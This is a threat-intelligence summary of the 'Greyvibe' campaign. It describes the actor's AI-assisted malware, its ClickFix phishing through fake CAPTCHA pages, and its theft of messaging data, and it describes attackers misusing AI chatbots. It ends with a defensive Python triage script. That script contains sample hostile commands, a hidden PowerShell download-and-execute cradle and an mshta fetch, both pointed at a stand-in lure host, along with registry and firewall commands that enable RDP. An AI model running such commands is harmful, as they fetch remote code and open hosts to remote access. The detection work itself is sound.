Greyvibe, a newly identified Russian-aligned hybrid threat actor, utilizes Generative AI tools—including ChatGPT, Google Gemini, and Ideogram AI—to accelerate the cyberattack lifecycle against Ukrainian military, government, and private sector targets. The group employs Large Language Models (LLMs) to automate the creation of custom PowerShell-based Remote Access Trojans (RATs), specifically PhantomRelay and LegionRelay, as well as the Android-based FallSpy spyware. Attackers leverage ClickFix-style phishing via fraudulent CloudFlare CAPTCHA pages and deploy obfuscated scripts, such as LOOKVALPS, LOOKVALJS, DAYLIGHT, and TEASOUP, to facilitate credential harvesting, RDP persistence, and the exfiltration of sensitive communications from platforms like Telegram and WhatsApp.
Campaign Overview & Strategic Context
- Operates as a hybrid threat, blending state-aligned intelligence objectives with technical TTPs characteristic of the cybercrime ecosystem.
- Primarily targets the Ukrainian military, government agencies (e.g., Kyiv City, State Emergency Service), and private sector entities.
- Active since at least August 2025, focusing on intelligence gathering to support Russian military strategic operations.
AI-Augmented Attack Mechanics
- Systematic integration of LLMs for the rapid development of custom malware, backend infrastructure, and automated social engineering.
- Deployment of Ideogram AI to generate highly convincing visual lures and deceptive personas for social engineering.
- Use of AI-generated code patterns that share little with the group's earlier tooling or with code attributed to known threat actors, complicating attribution and detection.
Technical Payload & Obfuscation Analysis
- PhantomRelay & LegionRelay: PowerShell-based RATs used for data exfiltration, Remote Desktop Protocol (RDP) setup, and stealing communication data.
- FallSpy: Android-based spyware designed for deep mobile surveillance, targeting contacts, call logs, location, and media files.
- Evasion Scripts: Deployment of LOOKVALPS (PowerShell), LOOKVALJS (JavaScript), DAYLIGHT (PowerShell), and TEASOUP (JavaScript) to bypass security controls.
Primary Attack Vectors & Delivery
- Social Engineering: Deployment of fraudulent charity websites for military drone support and deceptive adult club personas.
- Technical Deception: Execution of ClickFix-style attacks utilizing fake CloudFlare CAPTCHA pages to trigger malicious payloads.
- Cloud-Based Distribution: Utilization of legitimate services, including Google Drive and 4sync, to host and deliver malicious archives.
Impact and Data Compromise
- Communication Interception: Successful exfiltration of sensitive data and messages from Telegram and WhatsApp.
- Endpoint & Mobile Intelligence: Theft of browser credentials, file enumeration, and comprehensive mobile device metadata.
- Operational Persistence: Establishment of remote access via RDP to maintain long-term presence in compromised environments.
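Added defender-side example, not code from the Greyvibe report or any vendor tool: a small Python triage routine that flags the two host artefacts the ClickFix and RDP-persistence bullets above imply, a command pasted into the Win+R dialog (recorded under the RunMRU registry key) that launches a script host with a download cradle, and PowerShell script-block text (Event ID 4104) that switches on Remote Desktop. The RunMRU values, script-block lines and the lure hostname are all constructed samples, not indicators from the campaign.

```python
import re

# Constructed sample telemetry (hypothetical, not taken from the Greyvibe report).
# RunMRU values are exported as "<letter>: <command>\1", which is how Windows
# stores Win+R history; a ClickFix lure relies on the victim pasting here.
SAMPLE_RUNMRU = [
    r'a: powershell -w hidden -c "iwr http://lure.example.invalid/verify.txt | iex"\1',
    r'b: notepad.exe\1',
    r'c: mshta http://lure.example.invalid/captcha.hta\1',
]
# Constructed script-block text as logged by PowerShell Event ID 4104.
SAMPLE_SCRIPT_BLOCKS = [
    'Set-ItemProperty -Path "HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" '
    '-Name fDenyTSConnections -Value 0',
    'Get-ChildItem C:\\Users\\victim\\Documents',
    'netsh advfirewall firewall set rule group="remote desktop" new enable=Yes',
]

# A script host or LOLBin that can fetch and run remote content.
LAUNCHERS = re.compile(r'\b(powershell|pwsh|mshta|cmd|curl|certutil)\b', re.I)
# Download-cradle vocabulary or a raw URL inside the pasted command.
CRADLE = re.compile(r'\b(iwr|invoke-webrequest|downloadstring|iex|invoke-expression)\b|https?://', re.I)
# fDenyTSConnections set to 0 (Set-ItemProperty or reg add) or the RDP firewall group enabled.
RDP_ENABLE = re.compile(
    r'fDenyTSConnections\b[^\n]*?(?:-Value\s+|/d\s+)0\b|remote desktop[^\n]*?enable=yes', re.I)


def parse_runmru(lines):
    """Return the command text of each RunMRU value, stripping the trailing '\\1'."""
    cmds = []
    for line in lines:
        m = re.match(r'^\w+:\s*(.*?)(?:\\1)?$', line)
        if m:
            cmds.append(m.group(1))
    return cmds


def is_clickfix_command(cmd):
    """Launcher plus download cradle in a Run-dialog entry is the ClickFix hallmark."""
    return bool(LAUNCHERS.search(cmd) and CRADLE.search(cmd))


def enables_rdp(script_block):
    return bool(RDP_ENABLE.search(script_block))


def triage(runmru_lines, script_blocks):
    """Return (finding_type, evidence) pairs for a host's RunMRU export and 4104 logs."""
    findings = [("clickfix_run_dialog", c) for c in parse_runmru(runmru_lines) if is_clickfix_command(c)]
    findings += [("rdp_enabled", b) for b in script_blocks if enables_rdp(b)]
    return findings
```

Pairing a RunMRU hit with a later RDP-enabling script block on the same host is the sequence worth alerting on; either artefact alone is noisier.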